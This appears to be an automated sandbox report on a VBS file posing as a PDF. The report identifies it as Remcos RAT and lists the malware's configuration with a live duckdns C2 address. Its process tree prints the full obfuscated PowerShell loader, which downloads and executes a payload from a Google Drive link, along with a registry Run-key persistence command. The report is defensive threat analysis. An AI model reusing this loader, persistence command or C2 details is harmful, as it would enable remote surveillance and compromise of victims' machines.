Overview

overview

10

Static

static

1

328835_140...df.vbs

windows7-x64

10

328835_140...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    02-12-2024 10:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    328835_140264_1·pdf.vbs

  • Size

    33KB

  • MD5

    a9636ba5124550a3c145fef91fa5489d

  • SHA1

    f3ab90b16fef6a323c1a4eb44aa47acecdac3ca6

  • SHA256

    146882bf4a0d47c6db66dacbc5e283a85097a8320cf653641d380ebeab6c4c10

  • SHA512

    9b004cbdd4d35d7dd7038efd8e002b7022e1e6e9c3207535934f362c8e3a45e23ebe87ec1de5f7c37ff8f6afdbe7fc5deb5baa56957ba365abc8dae8a7fce7fa

  • SSDEEP

    768:+fZasQ6lMFJfJc4PCPPNngWWshZBTYRikWbVVw4OrxBX:eZasOFfXiPeWWs/BYse4OXX

Score
10/10
remcosremotehostdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\328835_140264_1·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Holbrook='Baalpladserne160';;$Peptonise='Kileskriften';;$Scenarioteknikken210='Deponerendes65';;$Aktieavancebeskatningerne='Bibabudukke';;$Oenanthylate=$host.Name;function Stainer($Cubitopalmar){If ($Oenanthylate) {$setout=4} for ($Standishes=$setout;;$Standishes+=5){if(!$Cubitopalmar[$Standishes]) { break };$Snappende+=$Cubitopalmar[$Standishes];$Ungdommens='Islandman140'}$Snappende}function Anholdelsens($Subdruid){ .($Udslyngning) ($Subdruid)}$Conakry=Stainer 'UncaNUnbueSc rT Tor. enW';$Conakry+=Stainer 'El,eEFirmb MarCLeonlChurIT,xiePepsN GulT';$Trykkested=Stainer 'P tuM SproE hizSpa i Fe l rgalVo,ta,reo/';$Siouxs=Stainer 'QereT Hj lBinosUntw1Wars2';$Rrggets='Od.o[ FrenEkebePrinTS.ag.OverSSlv eToolrBankv ispiOpl CPhraeL unP neuoInt iVatenBad.TLuf.M CitaStogn SubaSemigCh peSan RUnfo]Re,u:Is.g:Sp eS SobES emC SaluW serTe pI tvlTBag,Y onspCurtr,deroGullT esuO My.CFo.fOBygglSubt=Urim$ lassForsI Tr.oDo buGrovx fors';$Trykkested+=Stainer ' .re5Mrkh.Gold0De,i Atte(CompWUngpiRhumn vedRekooSkulwSponsSign OprrNPeleT Dra sluf1 Col0 aro.Bri 0A ti;e vi ,kydWGingiGarnnB un6Arbe4Jet.; Bla Pol xMate6Embr4Paho; nt Ur,srgalav Ran:Nonp1Fa i3Sa t1Harb.Ch o0 ata)Pust lecGCi,neMicrc BrakDepoo ear/Past2belt0Slsk1Hil 0Tran0Vand1Aggr0 Hit1S il SvejF acci itsrDiskeGridfUnwooTel xskra/Flea1Ster3Fiss1Undl.Skov0';$Standishesntonationer166=Stainer 'kn gUKvinsOmkoEElecRopma-bygnaNonug O tEHyp nConst';$Chemurgically=Stainer 'garth.evitSupetOmn pIntesDagp:Tran/ arr/Halsd L grBa li adivUnlie Acc. TaxgKantoMoisoIsatgMolelKakie Pre.Hallc alroAccom Zoo/ Sucu A ac Cat?GruneWintxClubpharmoClo rFordt F.s=Nonmdglado DiawFinenspatl,ndeoRadiaDecad plf&TilsiShindalm =Proc1Foto-Del VSprusTaliW Funjve,t8NonaRFla mUnm,bvoluHS.lbmCalvD HemMthttETrayA ra- Be O StaS ngyl,lasMKongb erm7Ch r8UbrugB.haBKlnilRedeWWinzZSp.oK ortCInstQ Sera';$Undubiousness=Stainer ' Sup>';$Udslyngning=Stainer ' FasiannoeB rdX';$overhringernes='Opsummeret';$situates='\Svrmens.Jag';Anholdelsens (Stainer 'Alme$ElemgRvr,L Pe o DowbkronABlokLRege:Incot jaleAppeRStormEmbaaLaboGChama dapNOve,TCupe=Sttt$ oneELandnSpi,V jvn: roeAGo,sPBystP Hy.dNurlAAutotInfaARamb+Brai$SamlSBulgiOpveTPremu AfsAsatiTMecheLam.S');Anholdelsens (Stainer 'Okta$La.rGUtaaL ,ulO SmebWannaKirkL Pe : disaaasmFFerrTMi.aEBlgerForfDBedmeSkaaaTagvtForkhRkeb=Unop$RappC A tH DenETa km subU LanRa.rogAlabIAltrCProfAKeralArg LBry,y Alt.Monos Ep,pKapplBombIB liTReb ( uc$ trauCastNBlandUbevU TilbInteIF nwO DgnUTennsHumbNSanseQuadskemiSKate)');Anholdelsens (Stainer $Rrggets);$Chemurgically=$Afterdeath[0];$Disorganize=(Stainer 'Deb $FrelgHulklA tiOSkytb KotaGeoeL Mut:CalaFMinei,haggCon.UhindrJol.a ,ngNAviaTQuodeMidtrPr.nnMateEShebs Tud=J,ggnHat.eKompwUd.y-D saoA tebMargJSk leLuftcHosptIc n rtesBr,cY.orksMicrTOrieePerfM,rbe.Rets$T.eacT ikoBetjnM,ssaBa,kk StarVuptY');Anholdelsens ($Disorganize);Anholdelsens (Stainer 'Dose$StosfJouri vingFretuSydar rbiaNuttnB wet Un.eRavirTelenHilleDyr,sStre.Mi lHOvereUnpraXyledSki,eG nor rmrs Und[Tesk$IlluSnsthteguea tann TindMuniiC,yps TrahGurieHardsPlo n A.tt Eiko Baan ryaz,brtUtaaiR froConsnBlaceUnmirBo r1 id6Serp6 en]P,ne=Alic$Kem TKinerBladyF.jekUn rk SkieGruns,niotSubseCompd');$Barrerne=Stainer 'En.o$TantfMonoi ribgXantuprocrEfteaBrnenHougt deeeUhusr Tw nFiksedecisGy o.StavDSkumoBogsw ArenAp.rl tomo laaA sedDrnnFPimpiTil lHnepe Dre(Undi$ redC .aphGulaeIndmmPdiauO tpr Ridg HaeiSin cReleaLa nl H plFireyBhut,Lang$p aeS O ek I dySh itPlant Gr,eWamplLnsle F lnInfu)';$Skyttelen=$Termagant;Anholdelsens (Stainer 'Land$ maggNynnl DatOPer.BFedeASphilMand:B syi ArgDAlcoeSi,ekAgeraForbTUv,daAdopLKiggOHydrG,ntieUnd,R PronNe.fESc lsHoli=pola(AcipTBro.Eov rsIndsTMid,- Va,P StraPrlatHerohAppl Moni$VitiSBuxoKC muy PertDryptOplgeDirkL Sh eOut n .as)');while (!$Idekatalogernes) {Anholdelsens (Stainer 'Eleg$Sherg KaplFr io Ep bVideaSynslhv d:MallKFremaid opFasti Bl t CriaRan,lKompeLaven UngsRapi= Qui$InveF cy oS ilrHuleePleupPrepif,leeCouncbuste') ;Anholdelsens $Barrerne;Anholdelsens (Stainer 'OffssBradT borA fi rGlistR ts-s avSBlodl udge hinEP laPBrid Husd4');Anholdelsens (Stainer 'Unst$ S,hg I nLTrigOPyrrB PunaUdlnlAfgr: elsiDauddgavleMagnk ianaUnivTa,deaPostLUnd,oskinG TekE Pi.rnonpnLastE U,psUdd,= S r(Ple.TKiloERejeSYdeltAute- OvepWooda,asatSme.H For Budg$HalsSFl xk forYTublt vrit SinEFornLM zzePorcnThre)') ;Anholdelsens (Stainer 'Bode$OriegSandlGtebO S abFuscASognlGe n: m rBPlauRHelliU.isD ParaHarrlCon LVilkyMund= Urd$FondgNiddlThyroGennbDingaSotelHor :EnerTRemaa Trarb.caMAvgue symnPork+Pure+Repe% Sph$FugeAErnrfVerot .riecarrRAmatDrumoE,preAMopetPlayh So .,angcOpgaOStoru UdsNKa at') ;$Chemurgically=$Afterdeath[$Bridally]}$Amenance=331516;$Overhunt=31171;Anholdelsens (Stainer 'Desa$ElmiGMoneL KrooSka b DyrAE itLcave: ourhte poVisiuGangpP,ste oolTimeA UndN ChadSpliETrun Flay=Admi Dit,G ,ore PleTSmit-Sve cArraOAnlgnUdvktretseU deNunpatStru Halm$KoloSBeblk nkuYBranTfingt rolE Sh lGingEDainn');Anholdelsens (Stainer 'Bo i$Ul,gg,krulAfveoEnerb B ra asal The:Ch rD acre upel ivkUnderRkene .akdWh.aeDiplr ndeeLouekFor,o Bi.nJ sktS.raoBygn afst= Sta lad[AfspSAfviyRespsSkostPrtee Na mPre .BadeC Daao artnSagsvBerteEcclr Uddt Tre]Tiaa:Grom:PomeFsmitr Volo affmAn iBm,rta strsBog.eMask6.taa4ButaSPrect tjerSam iBulknD shgtung(Lall$ erHNo foValguFi.mpCo,deOverlM laaPeltn KahdPaate.nim)');Anholdelsens (Stainer 'nonr$amfog Hy lOpspo RodBBjeraPretlUnif:K ipi lasnSpastBarlrUdkoO ,enJBor,e Op CTranTBifaESalodHypn eme= ar tar[KorsS G yy RenSLillTIhphe BodmB,id.UdputNo iEJetmX,ndeTRemb.ForhEBolsN MinCCarro omgdUdprIFyrinGa dGNett]Skri:Tll : prea ReeSDortc FjtISkimi Het.Pewtg TraEAvantPhotsDe iTpr,lR TusiTeneNTwadgFaun(Mari$resudKvasESpirL bsKClydrKrvoe ankdTradE,nliRDiabeSektKRgn.OXenoNBiciTPa oOExud)');Anholdelsens (Stainer ' pre$Hel gM teLBe.hoBegabNebrAOrchLAbu.: rkpu P,eNVianfMineAFai.M OceIa maLYawpiIse AdislRSkabL OrdYEle.=univ$InseiViziNWortTMenuRRaveOQ,eajAnnoE kogc SpaTLinee PaaDBtte. aanSKundUPardbMe asRhe Ts udrPalaINeosn htaG N n(Prof$Du dA R lm releErytN nadA SurNPol,CDeteeSt c,Clou$ WomoMonivweinE,nakRObskHFa eUpid.n Ch,tTale)');Anholdelsens $Unfamiliarly;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2984
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Holbrook='Baalpladserne160';;$Peptonise='Kileskriften';;$Scenarioteknikken210='Deponerendes65';;$Aktieavancebeskatningerne='Bibabudukke';;$Oenanthylate=$host.Name;function Stainer($Cubitopalmar){If ($Oenanthylate) {$setout=4} for ($Standishes=$setout;;$Standishes+=5){if(!$Cubitopalmar[$Standishes]) { break };$Snappende+=$Cubitopalmar[$Standishes];$Ungdommens='Islandman140'}$Snappende}function Anholdelsens($Subdruid){ .($Udslyngning) ($Subdruid)}$Conakry=Stainer 'UncaNUnbueSc rT Tor. enW';$Conakry+=Stainer 'El,eEFirmb MarCLeonlChurIT,xiePepsN GulT';$Trykkested=Stainer 'P tuM SproE hizSpa i Fe l rgalVo,ta,reo/';$Siouxs=Stainer 'QereT Hj lBinosUntw1Wars2';$Rrggets='Od.o[ FrenEkebePrinTS.ag.OverSSlv eToolrBankv ispiOpl CPhraeL unP neuoInt iVatenBad.TLuf.M CitaStogn SubaSemigCh peSan RUnfo]Re,u:Is.g:Sp eS SobES emC SaluW serTe pI tvlTBag,Y onspCurtr,deroGullT esuO My.CFo.fOBygglSubt=Urim$ lassForsI Tr.oDo buGrovx fors';$Trykkested+=Stainer ' .re5Mrkh.Gold0De,i Atte(CompWUngpiRhumn vedRekooSkulwSponsSign OprrNPeleT Dra sluf1 Col0 aro.Bri 0A ti;e vi ,kydWGingiGarnnB un6Arbe4Jet.; Bla Pol xMate6Embr4Paho; nt Ur,srgalav Ran:Nonp1Fa i3Sa t1Harb.Ch o0 ata)Pust lecGCi,neMicrc BrakDepoo ear/Past2belt0Slsk1Hil 0Tran0Vand1Aggr0 Hit1S il SvejF acci itsrDiskeGridfUnwooTel xskra/Flea1Ster3Fiss1Undl.Skov0';$Standishesntonationer166=Stainer 'kn gUKvinsOmkoEElecRopma-bygnaNonug O tEHyp nConst';$Chemurgically=Stainer 'garth.evitSupetOmn pIntesDagp:Tran/ arr/Halsd L grBa li adivUnlie Acc. TaxgKantoMoisoIsatgMolelKakie Pre.Hallc alroAccom Zoo/ Sucu A ac Cat?GruneWintxClubpharmoClo rFordt F.s=Nonmdglado DiawFinenspatl,ndeoRadiaDecad plf&TilsiShindalm =Proc1Foto-Del VSprusTaliW Funjve,t8NonaRFla mUnm,bvoluHS.lbmCalvD HemMthttETrayA ra- Be O StaS ngyl,lasMKongb erm7Ch r8UbrugB.haBKlnilRedeWWinzZSp.oK ortCInstQ Sera';$Undubiousness=Stainer ' Sup>';$Udslyngning=Stainer ' FasiannoeB rdX';$overhringernes='Opsummeret';$situates='\Svrmens.Jag';Anholdelsens (Stainer 'Alme$ElemgRvr,L Pe o DowbkronABlokLRege:Incot jaleAppeRStormEmbaaLaboGChama dapNOve,TCupe=Sttt$ oneELandnSpi,V jvn: roeAGo,sPBystP Hy.dNurlAAutotInfaARamb+Brai$SamlSBulgiOpveTPremu AfsAsatiTMecheLam.S');Anholdelsens (Stainer 'Okta$La.rGUtaaL ,ulO SmebWannaKirkL Pe : disaaasmFFerrTMi.aEBlgerForfDBedmeSkaaaTagvtForkhRkeb=Unop$RappC A tH DenETa km subU LanRa.rogAlabIAltrCProfAKeralArg LBry,y Alt.Monos Ep,pKapplBombIB liTReb ( uc$ trauCastNBlandUbevU TilbInteIF nwO DgnUTennsHumbNSanseQuadskemiSKate)');Anholdelsens (Stainer $Rrggets);$Chemurgically=$Afterdeath[0];$Disorganize=(Stainer 'Deb $FrelgHulklA tiOSkytb KotaGeoeL Mut:CalaFMinei,haggCon.UhindrJol.a ,ngNAviaTQuodeMidtrPr.nnMateEShebs Tud=J,ggnHat.eKompwUd.y-D saoA tebMargJSk leLuftcHosptIc n rtesBr,cY.orksMicrTOrieePerfM,rbe.Rets$T.eacT ikoBetjnM,ssaBa,kk StarVuptY');Anholdelsens ($Disorganize);Anholdelsens (Stainer 'Dose$StosfJouri vingFretuSydar rbiaNuttnB wet Un.eRavirTelenHilleDyr,sStre.Mi lHOvereUnpraXyledSki,eG nor rmrs Und[Tesk$IlluSnsthteguea tann TindMuniiC,yps TrahGurieHardsPlo n A.tt Eiko Baan ryaz,brtUtaaiR froConsnBlaceUnmirBo r1 id6Serp6 en]P,ne=Alic$Kem TKinerBladyF.jekUn rk SkieGruns,niotSubseCompd');$Barrerne=Stainer 'En.o$TantfMonoi ribgXantuprocrEfteaBrnenHougt deeeUhusr Tw nFiksedecisGy o.StavDSkumoBogsw ArenAp.rl tomo laaA sedDrnnFPimpiTil lHnepe Dre(Undi$ redC .aphGulaeIndmmPdiauO tpr Ridg HaeiSin cReleaLa nl H plFireyBhut,Lang$p aeS O ek I dySh itPlant Gr,eWamplLnsle F lnInfu)';$Skyttelen=$Termagant;Anholdelsens (Stainer 'Land$ maggNynnl DatOPer.BFedeASphilMand:B syi ArgDAlcoeSi,ekAgeraForbTUv,daAdopLKiggOHydrG,ntieUnd,R PronNe.fESc lsHoli=pola(AcipTBro.Eov rsIndsTMid,- Va,P StraPrlatHerohAppl Moni$VitiSBuxoKC muy PertDryptOplgeDirkL Sh eOut n .as)');while (!$Idekatalogernes) {Anholdelsens (Stainer 'Eleg$Sherg KaplFr io Ep bVideaSynslhv d:MallKFremaid opFasti Bl t CriaRan,lKompeLaven UngsRapi= Qui$InveF cy oS ilrHuleePleupPrepif,leeCouncbuste') ;Anholdelsens $Barrerne;Anholdelsens (Stainer 'OffssBradT borA fi rGlistR ts-s avSBlodl udge hinEP laPBrid Husd4');Anholdelsens (Stainer 'Unst$ S,hg I nLTrigOPyrrB PunaUdlnlAfgr: elsiDauddgavleMagnk ianaUnivTa,deaPostLUnd,oskinG TekE Pi.rnonpnLastE U,psUdd,= S r(Ple.TKiloERejeSYdeltAute- OvepWooda,asatSme.H For Budg$HalsSFl xk forYTublt vrit SinEFornLM zzePorcnThre)') ;Anholdelsens (Stainer 'Bode$OriegSandlGtebO S abFuscASognlGe n: m rBPlauRHelliU.isD ParaHarrlCon LVilkyMund= Urd$FondgNiddlThyroGennbDingaSotelHor :EnerTRemaa Trarb.caMAvgue symnPork+Pure+Repe% Sph$FugeAErnrfVerot .riecarrRAmatDrumoE,preAMopetPlayh So .,angcOpgaOStoru UdsNKa at') ;$Chemurgically=$Afterdeath[$Bridally]}$Amenance=331516;$Overhunt=31171;Anholdelsens (Stainer 'Desa$ElmiGMoneL KrooSka b DyrAE itLcave: ourhte poVisiuGangpP,ste oolTimeA UndN ChadSpliETrun Flay=Admi Dit,G ,ore PleTSmit-Sve cArraOAnlgnUdvktretseU deNunpatStru Halm$KoloSBeblk nkuYBranTfingt rolE Sh lGingEDainn');Anholdelsens (Stainer 'Bo i$Ul,gg,krulAfveoEnerb B ra asal The:Ch rD acre upel ivkUnderRkene .akdWh.aeDiplr ndeeLouekFor,o Bi.nJ sktS.raoBygn afst= Sta lad[AfspSAfviyRespsSkostPrtee Na mPre .BadeC Daao artnSagsvBerteEcclr Uddt Tre]Tiaa:Grom:PomeFsmitr Volo affmAn iBm,rta strsBog.eMask6.taa4ButaSPrect tjerSam iBulknD shgtung(Lall$ erHNo foValguFi.mpCo,deOverlM laaPeltn KahdPaate.nim)');Anholdelsens (Stainer 'nonr$amfog Hy lOpspo RodBBjeraPretlUnif:K ipi lasnSpastBarlrUdkoO ,enJBor,e Op CTranTBifaESalodHypn eme= ar tar[KorsS G yy RenSLillTIhphe BodmB,id.UdputNo iEJetmX,ndeTRemb.ForhEBolsN MinCCarro omgdUdprIFyrinGa dGNett]Skri:Tll : prea ReeSDortc FjtISkimi Het.Pewtg TraEAvantPhotsDe iTpr,lR TusiTeneNTwadgFaun(Mari$resudKvasESpirL bsKClydrKrvoe ankdTradE,nliRDiabeSektKRgn.OXenoNBiciTPa oOExud)');Anholdelsens (Stainer ' pre$Hel gM teLBe.hoBegabNebrAOrchLAbu.: rkpu P,eNVianfMineAFai.M OceIa maLYawpiIse AdislRSkabL OrdYEle.=univ$InseiViziNWortTMenuRRaveOQ,eajAnnoE kogc SpaTLinee PaaDBtte. aanSKundUPardbMe asRhe Ts udrPalaINeosn htaG N n(Prof$Du dA R lm releErytN nadA SurNPol,CDeteeSt c,Clou$ WomoMonivweinE,nakRObskHFa eUpid.n Ch,tTale)');Anholdelsens $Unfamiliarly;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Milliammetres% -windowstyle 1 $Chevise=(gp -Path 'HKCU:\Software\Scarfpins\').Hospitious24;%Milliammetres% ($Chevise)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Milliammetres% -windowstyle 1 $Chevise=(gp -Path 'HKCU:\Software\Scarfpins\').Hospitious24;%Milliammetres% ($Chevise)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1992

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    ce0ae15937bf44f4f471c92753e555de

    SHA1

    477627305dd178901dee4e35ea11b56af96ade42

    SHA256

    fd4f16c9953cee7429ae3af846dda6debefdfb934803af29a84977631173098d

    SHA512

    dc9bc9aafcfed2a861aa1c13386f2cb6a167d05c1b1a699ec4fb7361a5fd1239ff95a200cd926614f084d7ee60ed5d359ef78f77b669fbcf94c582cdb5007be1

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabB147.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar2E42.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7H6896BEHAAPJ5TUXD7T.temp
    Filesize

    7KB

    MD5

    6560a2e29ee9af4849dee2ae662bd39f

    SHA1

    47ee92d62451bfcd8365c9529cb7f53e0833f0b0

    SHA256

    d95d6d25481fe1678a94fe7405e983860d7ec597a8b1384220bc595489f6dddd

    SHA512

    8725c659786f058babda9fb50c95e54ee5d225060e4bd185f02c4bcacd6c76553b35f4526635438e03e449b7d00f1ceb8a60b4b5464ed12f57b419baa5df65e0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Svrmens.Jag
    Filesize

    472KB

    MD5

    446422fa7fea111877f8479983047645

    SHA1

    809d50b29798cc9fe183379389d98583d1ca71c4

    SHA256

    0cf981f2f27a017651d067e0864eb90e84b6b0dd02113e1aa82b19fd0337b4ee

    SHA512

    6060d17ba683b83060af3e01c4cce6bb99d20e9700b134bdf3bc11b884bdb26bb7120b95180acdc99f1cae956d7fdd9cc3d3e291648c4df522f11d58e4db6bef

    Download Submit

  • memory/2024-63-0x0000000000810000-0x0000000001872000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2024-60-0x0000000000810000-0x0000000001872000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2848-37-0x0000000006880000-0x00000000081F8000-memory.dmp

    Filesize

    25.5MB

    Download

  • memory/2984-25-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-28-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2984-30-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-31-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-33-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-27-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-24-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-26-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-22-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2984-23-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2984-21-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2984-20-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

    Filesize

    4KB

    Download